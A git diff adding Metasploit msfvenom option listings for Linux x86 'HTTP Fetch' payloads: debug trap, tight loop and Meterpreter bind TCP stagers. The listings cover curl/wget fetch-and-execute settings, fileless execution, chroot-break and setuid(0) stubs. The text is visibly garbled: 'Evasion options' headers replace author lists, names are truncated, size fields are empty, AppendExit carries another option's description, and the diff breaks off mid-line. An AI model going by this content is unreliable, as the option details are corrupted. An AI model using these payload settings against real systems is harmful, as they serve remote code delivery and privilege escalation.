MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + NullFreeVersion false yes Null-free shellcode version + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the 
setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-generic-debug_trap.txt b/msfvenom/payload_options/cmd-linux-http-x86-generic-debug_trap.txt new file mode 100644 index 0000000..b4f7fec --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-generic-debug_trap.txt 
@@ -0,0 +1,65 @@ + + Name: HTTP Fetch, Generic x86 Debug Trap + Module: payload/cmd/linux/http/x86/generic/debug_trap + Platform: Linux, BSD, BSDi, OSX, Solaris, Windows + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + robert + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME pjMOlGFBl no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. 
+ Generate a debug trap in the target process + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-generic-tight_loop.txt b/msfvenom/payload_options/cmd-linux-http-x86-generic-tight_loop.txt new file mode 100644 index 0000000..46bbf45 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-generic-tight_loop.txt 
@@ -0,0 +1,65 @@ + + Name: HTTP Fetch, Generic x86 Tight Loop + Module: payload/cmd/linux/http/x86/generic/tight_loop + Platform: Linux, BSD, BSDi, OSX, Solaris, Windows + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + jduck + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME zQKXcTkfE no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. 
+ Generate a tight loop in the target process + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_ipv6_tcp.txt new file mode 100644 index 0000000..c8aacb9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_ipv6_tcp.txt 
@@ -0,0 +1,102 @@ + + Name: HTTP Fetch, Bind IPv6 TCP Stager (Linux x86) + Module: payload/cmd/linux/http/x86/meterpreter/bind_ipv6_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: +Evasion options for payload/cmd/linux/http/x86/meterpreter/bind_ipv6_tcp: +========================= + +iam_webb@rapid7.com> + kris katterjohn + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME iYLYuejSi no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. 
+ Listen for an IPv6 connection (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of 
a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_ipv6_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_ipv6_tcp_uuid.txt new file mode 100644 index 0000000..4cc0bf4 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_ipv6_tcp_uuid.txt 
@@ -0,0 +1,102 @@ + + Name: HTTP Fetch, Bind IPv6 TCP Stager with UUID Support (Linux x86) + Module: payload/cmd/linux/http/x86/meterpreter/bind_ipv6_tcp_uuid + Platform: Linux, Linux + Arch: cmd +Needs Admin: No +Evasion options for payload/cmd/linux/http/x86/meterpreter/bind_ipv6_tcp_uuid: +========================= + +bb + kris katterjohn + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME AobslNTQQbO no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. 
+ Listen for an IPv6 connection with UUID Support (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of 
a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_nonx_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_nonx_tcp.txt new file mode 100644 index 0000000..5b8ac46 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_nonx_tcp.txt 
@@ -0,0 +1,102 @@ + + Name: HTTP Fetch, Bind TCP Stager + Module: payload/cmd/linux/http/x86/meterpreter/bind_nonx_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: +Evasion options for payload/cmd/linux/http/x86/meterpreter/bind_nonx_tcp: +========================= + +om> + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME fxLsSRldGnIi no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see 
https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to 
preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_tcp.txt new file mode 100644 index 0000000..d04a06c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_tcp.txt 
@@ -0,0 +1,102 @@ + + Name: HTTP Fetch, Bind TCP Stager (Linux x86) + Module: payload/cmd/linux/http/x86/meterpreter/bind_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: +Evasion options for payload/cmd/linux/http/x86/meterpreter/bind_tcp: +========================= + + + skape + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ZZOVgYZknLux no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Listen for a connection (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see 
https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to 
preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_tcp_uuid.txt new file mode 100644 index 0000000..20af858 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_tcp_uuid.txt 
@@ -0,0 +1,102 @@ + + Name: HTTP Fetch, Bind TCP Stager with UUID Support (Linux x86) + Module: payload/cmd/linux/http/x86/meterpreter/bind_tcp_uuid + Platform: Linux, Linux + Arch: cmd +Needs Admin: No +Evasion options for payload/cmd/linux/http/x86/meterpreter/bind_tcp_uuid: +========================= + +am Webb + skape + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ntRGzTtlAXTs no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. 
+ Listen for a connection with UUID Support (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see 